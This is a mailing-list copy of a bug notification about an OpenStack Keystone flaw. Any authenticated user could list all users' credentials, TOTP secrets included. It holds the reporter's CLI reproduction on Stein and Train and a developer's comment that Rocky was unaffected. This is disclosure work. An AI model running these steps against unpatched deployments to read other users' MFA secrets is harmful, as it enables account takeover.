[Bug 1855080] Re: Credentials API allows listing and retrieving of all users credentials

Gage Hugo gagehugo at gmail.com
Mon Dec 9 16:24:48 UTC 2019 

I wasn't able to recreate this with Rocky, only a user with the "admin"
role was able to list credentials, other users with member roles were
denied (as policy defined).

The code was indeed changed after Rocky to account for system scope,
where I believe that this issue was introduced.

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to keystone in Ubuntu.
https://bugs.launchpad.net/bugs/1855080

Title:
  Credentials API allows listing and retrieving of all users credentials

Status in OpenStack Identity (keystone):
  Fix Released
Status in OpenStack Security Advisory:
  Confirmed
Status in keystone package in Ubuntu:
  New

Bug description:
  Tested against Stein and Train.

  # User creating a credential, i.e totp or similar
  $ OS_CLOUD=1 openstack token issue
  | project_id | c3caf1b55bb84b78a795fd81838e5160
  | user_id    | 9971b0f13d2d4a578212d028a53c3209
  $ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
  $ OS_CLOUD=1 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  # Different User but same Project
  $ OS_CLOUD=2 openstack token issue
  | project_id | c3caf1b55bb84b78a795fd81838e5160
  | user_id    | 6b28a0b073fc4ac7843f33190ebc5c3c
  $ OS_CLOUD=2 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  # Different User and Different Project
  $ OS_CLOUD=3 openstack token issue
  | project_id | d43f20ae5a7e4f36b701710277384401
  | user_id    | 2e48f1a7d1474391a826a2b9700e5949
  $ OS_CLOUD=3 openstack credential list
  +----------------------------------+------+----------------------------------+-----------+------------+
  | ID                               | Type | User ID                          | Data      | Project ID |
  +----------------------------------+------+----------------------------------+-----------+------------+
  | 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
  +----------------------------------+------+----------------------------------+-----------+------------+

  As shown anyone who's authenticated can retrieve any credentials
  including their 'secret'.

  This is a rather severe information disclosure vulnerability and
  completely defies the purpose of TOTP or MFA as these credentials are
  not kept secure or private whatsoever.

  If Auth-rules are configured allow login with only 'topt' it would be
  extremely easy to assume a different user's identity.

  A CVE should be issued for this. I can take care of that paperwork.

  Versions affected and tested:

  Train/ubuntu:
  $ dpkg -l | grep keystone
  ii  keystone                             2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Daemons
  ii  keystone-common                      2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Common files
  ii  python-keystoneauth1                 3.13.1-0ubuntu1~cloud0                                      all          authentication library for OpenStack Identity - Python 2.7
  ii  python-keystoneclient                1:3.19.0-0ubuntu1~cloud0                                    all          client library for the OpenStack Keystone API - Python 2.x
  ii  python-keystonemiddleware            6.0.0-0ubuntu1~cloud0                                       all          Middleware for OpenStack Identity (Keystone) - Python 2.x
  ii  python3-keystone                     2:16.0.0-0ubuntu1~cloud0                                    all          OpenStack identity service - Python 3 library
  ii  python3-keystoneauth1                3.17.1-0ubuntu1~cloud0                                      all          authentication library for OpenStack Identity - Python 3.x
  ii  python3-keystoneclient               1:3.21.0-0ubuntu1~cloud0                                    all          client library for the OpenStack Keystone API - Python 3.x
  ii  python3-keystonemiddleware           7.0.1-0ubuntu1~cloud0                                       all          Middleware for OpenStack Identity (Keystone) - Python 3.x

  Stein/RHEL:
  $ rpm -qa | grep keystone
  python3-keystoneclient-3.19.0-0.20190312070330.6c4bb8b.el8ost.noarch
  openstack-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
  python3-keystoneauth1-3.13.1-0.20190311052414.bde07bc.el8ost.noarch
  python3-keystonemiddleware-6.0.0-0.20190312071144.fca37ea.el8ost.noarch
  python3-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1855080/+subscriptions

More information about the Ubuntu-openstack-bugs mailing list